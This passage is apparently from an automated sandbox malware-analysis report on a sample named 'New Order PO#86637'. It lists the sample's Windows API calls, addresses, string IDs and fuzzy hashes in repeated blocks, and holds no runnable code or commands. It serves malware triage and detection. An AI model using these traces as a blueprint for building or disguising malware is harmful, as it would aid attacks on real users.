                                                                            • Instruction ID: 8916cda2fcff4f3da81aa675480f1736598f59ba0f795e6899437ff2d0190f01
                                                                            • Opcode Fuzzy Hash: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                                                            • Instruction Fuzzy Hash: E061EDB1604301AAD710EF69D885B6B77A4AF99315F04493FF98087292E7BCD84CC79B
                                                                            APIs
                                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                            • SetErrorMode.KERNEL32 ref: 004781CE
                                                                            • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                                                                              • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                            • SetErrorMode.KERNEL32(?), ref: 00478270
                                                                            • SetErrorMode.KERNEL32(?), ref: 00478340
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMode$AttributesFile_memmove_wcslen
                                                                            • String ID: \VH
                                                                            • API String ID: 3884216118-234962358
                                                                            • Opcode ID: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                                            • Instruction ID: 3f1cdca54a202f1bd1938e87a451cd9606667cca5306a7eaf6ab6c0a6d737147
                                                                            • Opcode Fuzzy Hash: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                                            • Instruction Fuzzy Hash: F9619F715043019BC310EF25C585A5BB7E0BFC8708F04896EFA996B392CB76ED45CB96
                                                                            APIs
                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                                                                            • IsMenu.USER32(?), ref: 0044854D
                                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                                                                            • DrawMenuBar.USER32 ref: 004485AF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Item$DrawInfoInsert
                                                                            • String ID: 0
                                                                            • API String ID: 3076010158-4108050209
                                                                            • Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                                            • Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
                                                                            • Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                                            • Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
                                                                            APIs
                                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                            • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
                                                                            • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
                                                                            • SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
                                                                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$_memmove_wcslen
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 1589278365-1403004172
                                                                            • Opcode ID: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
                                                                            • Instruction ID: b025c67d46b61e1fa51b41144ded2117d8c1ab71acdc4e5cb50a5164a05e923b
                                                                            • Opcode Fuzzy Hash: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
                                                                            • Instruction Fuzzy Hash: 8D31287160010477DB10BB69CC45BEF775C9F86324F10852FF918AB2D1DABC9E4583A6
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Handle
                                                                            • String ID: nul
                                                                            • API String ID: 2519475695-2873401336
                                                                            • Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                                            • Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
                                                                            • Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                                            • Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
                                                                            APIs
                                                                            • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Handle
                                                                            • String ID: nul
                                                                            • API String ID: 2519475695-2873401336
                                                                            • Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                                            • Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
                                                                            • Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                                            • Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
                                                                            APIs
                                                                            • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
                                                                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                            • _wcsncpy.LIBCMT ref: 00401C41
                                                                            • _wcscpy.LIBCMT ref: 00401C5D
                                                                            • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
                                                                            • String ID: Line:
                                                                            • API String ID: 1874344091-1585850449
                                                                            • Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                                            • Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
                                                                            • Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                                            • Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: SysAnimate32
                                                                            • API String ID: 0-1011021900
                                                                            • Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                                            • Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
                                                                            • Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                                            • Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
                                                                            APIs
                                                                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                              • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                                              • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                                              • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                                              • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
                                                                            • GetFocus.USER32 ref: 0046157B
                                                                              • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
                                                                              • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 004615C4
                                                                            • EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
                                                                            • __swprintf.LIBCMT ref: 00461608
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
                                                                            • String ID: %s%d
                                                                            • API String ID: 2645982514-1110647743
                                                                            • Opcode ID: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                                            • Instruction ID: 8eac61321038dbd32bfe14263504560db7c98c8fbeeeb2eb49a46d34c9d63f73
                                                                            • Opcode Fuzzy Hash: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                                            • Instruction Fuzzy Hash: 272180756007096BD610AF69DC89FAF73A8FB88704F00841FF918A7241DAB8A9418B69
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                                            • Instruction ID: b0f148a0463f8e77612455c4d0488571574065cadd758f34d18f988e9301810f
                                                                            • Opcode Fuzzy Hash: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                                            • Instruction Fuzzy Hash: 2A819F74600604BFEB24CF95C994FBB7B68EF59350F10804EF8959B341E6B8AC45CB6A
                                                                            APIs
                                                                            • GetCurrentProcessId.KERNEL32(?), ref: 0047584D
                                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
                                                                            • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
                                                                            • CloseHandle.KERNEL32(00000000), ref: 00475A4D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Process$CloseCountersCurrentHandleOpen
                                                                            • String ID:
                                                                            • API String ID: 3488606520-0
                                                                            • Opcode ID: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                                                            • Instruction ID: 747e8e91012d04cc7bcfbda4f2b49d0ca9967bea8b965680eccea6cdbc9dea0c
                                                                            • Opcode Fuzzy Hash: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                                                            • Instruction Fuzzy Hash: 82817170A047029FD310DF65C981B4BBBE1BF84704F10892EF6999B3D2DA75E944CB96
                                                                            APIs
                                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: ConnectRegistry_memmove_wcslen
                                                                            • String ID:
                                                                            • API String ID: 15295421-0
                                                                            • Opcode ID: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                                            • Instruction ID: 481e56be03c4cee60d8ca92471cfa4b3875eab78bcfcbf7fb961631f720e0f99
                                                                            • Opcode Fuzzy Hash: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                                            • Instruction Fuzzy Hash: 7D515F71208301ABD304EF65C885E5BB7A8FF88704F10892EB54597291D774E945CBA6
                                                                            APIs
                                                                            • LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
                                                                            • GetProcAddress.KERNEL32(?,?), ref: 004648F7
                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 00464916
                                                                            • GetProcAddress.KERNEL32(?,?), ref: 0046495A
                                                                            • FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$Library$FreeLoad
                                                                            • String ID:
                                                                            • API String ID: 2449869053-0
                                                                            • Opcode ID: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                                            • Instruction ID: 8919579e2c9fc9b2d94c4928dd3202a5bdd7863bc063e44bf2a6fba2f1eed130
                                                                            • Opcode Fuzzy Hash: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                                            • Instruction Fuzzy Hash: 2351BF756002049FCB00EFA4C985A9EB7B4EF88304F14856EFD05AB392DB79ED45CB99
                                                                            APIs
                                                                            • GetCursorPos.USER32(?), ref: 004563A6
                                                                            • ScreenToClient.USER32(?,?), ref: 004563C3
                                                                            • GetAsyncKeyState.USER32(?), ref: 00456400
                                                                            • GetAsyncKeyState.USER32(?), ref: 00456410
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00456466
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: AsyncState$ClientCursorLongScreenWindow
                                                                            • String ID:
                                                                            • API String ID: 3539004672-0
                                                                            • Opcode ID: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                                            • Instruction ID: 60090bce41a6de58f2ab96a8453d1e3558661e38fd0c916b19f374a884add038
                                                                            • Opcode Fuzzy Hash: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                                            • Instruction Fuzzy Hash: 49414C74504204BBDB24CF65C884EEFBBB8EB46326F60464EFC6593281CB34A944CB68
                                                                            APIs
                                                                            • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
                                                                            • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
                                                                            • Sleep.KERNEL32(0000000A), ref: 0047D455
                                                                            • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
                                                                            • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Interlocked$DecrementIncrement$Sleep
                                                                            • String ID:
                                                                            • API String ID: 327565842-0
                                                                            • Opcode ID: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                                            • Instruction ID: e00c67d4cb89bf1d5311357fb713975cbca1e0cfcee7190b0451066ade77f289
                                                                            • Opcode Fuzzy Hash: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                                            • Instruction Fuzzy Hash: CC412571A002055FEB10DF65CD84AEE7774EF45304B10852EF609A7351E738EE46CB99
                                                                            APIs
                                                                            • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
                                                                            • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
                                                                            • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
                                                                            • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
                                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
